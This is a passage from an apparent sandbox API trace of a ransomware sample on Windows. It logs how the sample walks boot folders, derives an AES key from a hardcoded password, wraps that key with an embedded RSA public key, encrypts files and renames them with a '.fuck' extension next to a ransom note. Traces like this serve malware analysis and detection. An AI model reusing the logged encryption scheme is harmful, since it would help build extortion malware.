"c:\\boot\\cs-cz\\bootmgr.exe.mui.gsg")) returned 0 [0231.241] MoveFileA (lpExistingFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.fuck")) returned 0 [0231.241] CryptDestroyHash (hHash=0x394ba8) returned 1 [0231.241] CryptDestroyKey (hKey=0x394768) returned 1 [0231.241] CryptReleaseContext (hProv=0x395a38, dwFlags=0x0) returned 1 [0231.241] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.241] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.241] GetLastError () returned 0x5 [0231.241] SetLastError (dwErrCode=0x5) [0231.241] GetLastError () returned 0x5 [0231.241] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.242] SetLastError (dwErrCode=0x5) [0231.242] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetLastError () returned 0x5 [0231.243] SetLastError (dwErrCode=0x5) [0231.243] GetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui")) returned 0x20 [0231.243] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.244] CreateFileA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.244] CreateFileA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.244] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.244] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x395a38) returned 1 [0231.247] CryptCreateHash (in: hProv=0x395a38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.247] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.247] CryptHashData (hHash=0x394e68, pbData=0x2ec8a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.247] CryptDeriveKey (in: hProv=0x395a38, Algid=0x6610, hBaseData=0x394e68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394e28) returned 1 [0231.247] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.247] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.247] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2dd300) returned 1 [0231.247] CryptImportPublicKeyInfo (in: hCryptProv=0x2dd300, dwCertEncodingType=0x1, pInfo=0x2760ee0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760f10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760f18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394768) returned 1 [0231.247] CryptEncrypt (in: hKey=0x394768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.247] CryptEncrypt (in: hKey=0x394768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2761830*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2761830*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.248] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2761830, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.248] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2761bd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2761bd0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.248] CryptEncrypt (in: hKey=0x394e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2761bd0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2761bd0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.248] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2761bd0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.248] CloseHandle (hObject=0xffffffff) returned 1 [0231.248] CloseHandle (hObject=0xffffffff) returned 1 [0231.248] CopyFileA (lpExistingFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.248] SetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.248] DeleteFileA (lpFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.gsg")) returned 0 [0231.249] MoveFileA (lpExistingFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\cs-CZ\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.fuck")) returned 0 [0231.249] CryptDestroyHash (hHash=0x394e68) returned 1 [0231.249] CryptDestroyKey (hKey=0x394e28) returned 1 [0231.249] CryptReleaseContext (hProv=0x395a38, dwFlags=0x0) returned 1 [0231.249] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.249] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.249] FindClose (in: hFindFile=0x394d28 | out: hFindFile=0x394d28) returned 1 [0231.249] GetFileAttributesA (lpFileName="C:\\\\Boot\\cs-CZ\\README_BACK_FILES.htm" (normalized: "c:\\boot\\cs-cz\\readme_back_files.htm")) returned 0x20 [0231.250] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.250] FindFirstFileA (in: lpFileName="C:\\\\Boot\\da-DK\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394d28 [0231.252] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.252] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.252] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.252] GetLastError () returned 0x12 [0231.252] SetLastError (dwErrCode=0x12) [0231.252] GetLastError () returned 0x12 [0231.252] SetLastError (dwErrCode=0x12) [0231.252] GetLastError () returned 0x12 [0231.252] SetLastError (dwErrCode=0x12) [0231.252] GetLastError () returned 0x12 [0231.252] SetLastError (dwErrCode=0x12) [0231.252] GetLastError () returned 0x12 [0231.252] SetLastError (dwErrCode=0x12) [0231.252] GetLastError () returned 0x12 [0231.252] SetLastError (dwErrCode=0x12) [0231.252] GetLastError () returned 0x12 [0231.252] SetLastError (dwErrCode=0x12) [0231.252] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.253] SetLastError (dwErrCode=0x12) [0231.253] GetLastError () returned 0x12 [0231.254] SetLastError (dwErrCode=0x12) [0231.254] GetLastError () returned 0x12 [0231.254] SetLastError (dwErrCode=0x12) [0231.254] GetLastError () returned 0x12 [0231.254] SetLastError (dwErrCode=0x12) [0231.254] GetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0231.254] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.255] CreateFileA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.255] CreateFileA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.255] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.255] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b0c0) returned 1 [0231.258] CryptCreateHash (in: hProv=0x275b0c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.258] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.258] CryptHashData (hHash=0x394e28, pbData=0x2ec710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.258] CryptDeriveKey (in: hProv=0x275b0c0, Algid=0x6610, hBaseData=0x394e28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x3949a8) returned 1 [0231.258] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.258] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.258] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275bad8) returned 1 [0231.258] CryptImportPublicKeyInfo (in: hCryptProv=0x275bad8, dwCertEncodingType=0x1, pInfo=0x2760fb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760fe0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760fe8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394868) returned 1 [0231.259] CryptEncrypt (in: hKey=0x394868, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.259] CryptEncrypt (in: hKey=0x394868, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275b9c8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275b9c8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.259] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275b9c8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.259] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27626c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27626c8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.259] CryptEncrypt (in: hKey=0x3949a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27626c8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27626c8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.259] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27626c8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.259] CloseHandle (hObject=0xffffffff) returned 1 [0231.259] CloseHandle (hObject=0xffffffff) returned 1 [0231.259] CopyFileA (lpExistingFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.259] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.260] DeleteFileA (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.gsg")) returned 0 [0231.260] MoveFileA (lpExistingFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.fuck")) returned 0 [0231.260] CryptDestroyHash (hHash=0x394e28) returned 1 [0231.260] CryptDestroyKey (hKey=0x3949a8) returned 1 [0231.260] CryptReleaseContext (hProv=0x275b0c0, dwFlags=0x0) returned 1 [0231.260] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.261] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.261] SetLastError (dwErrCode=0x5) [0231.261] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetLastError () returned 0x5 [0231.262] SetLastError (dwErrCode=0x5) [0231.262] GetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui")) returned 0x20 [0231.262] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.263] CreateFileA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.263] CreateFileA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.263] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.263] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b3f0) returned 1 [0231.266] CryptCreateHash (in: hProv=0x275b3f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.266] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.266] CryptHashData (hHash=0x394be8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.266] CryptDeriveKey (in: hProv=0x275b3f0, Algid=0x6610, hBaseData=0x394be8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394ba8) returned 1 [0231.266] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.266] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.266] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b588) returned 1 [0231.266] CryptImportPublicKeyInfo (in: hCryptProv=0x275b588, dwCertEncodingType=0x1, pInfo=0x2761080*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27610b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27610b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394e28) returned 1 [0231.266] CryptEncrypt (in: hKey=0x394e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.266] CryptEncrypt (in: hKey=0x394e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275b258*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275b258*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.267] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275b258, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.267] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2762b88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2762b88, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.267] CryptEncrypt (in: hKey=0x394ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2762b88*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2762b88*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.267] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2762b88, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.267] CloseHandle (hObject=0xffffffff) returned 1 [0231.267] CloseHandle (hObject=0xffffffff) returned 1 [0231.267] CopyFileA (lpExistingFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.267] SetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.267] DeleteFileA (lpFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.gsg")) returned 0 [0231.268] MoveFileA (lpExistingFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\da-DK\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.fuck")) returned 0 [0231.268] CryptDestroyHash (hHash=0x394be8) returned 1 [0231.268] CryptDestroyKey (hKey=0x394ba8) returned 1 [0231.268] CryptReleaseContext (hProv=0x275b3f0, dwFlags=0x0) returned 1 [0231.268] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.268] FindNextFileA (in: hFindFile=0x394d28, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.268] FindClose (in: hFindFile=0x394d28 | out: hFindFile=0x394d28) returned 1 [0231.268] GetFileAttributesA (lpFileName="C:\\\\Boot\\da-DK\\README_BACK_FILES.htm" (normalized: "c:\\boot\\da-dk\\readme_back_files.htm")) returned 0x20 [0231.269] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.269] FindFirstFileA (in: lpFileName="C:\\\\Boot\\de-DE\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x3949a8 [0231.271] FindNextFileA (in: hFindFile=0x3949a8, 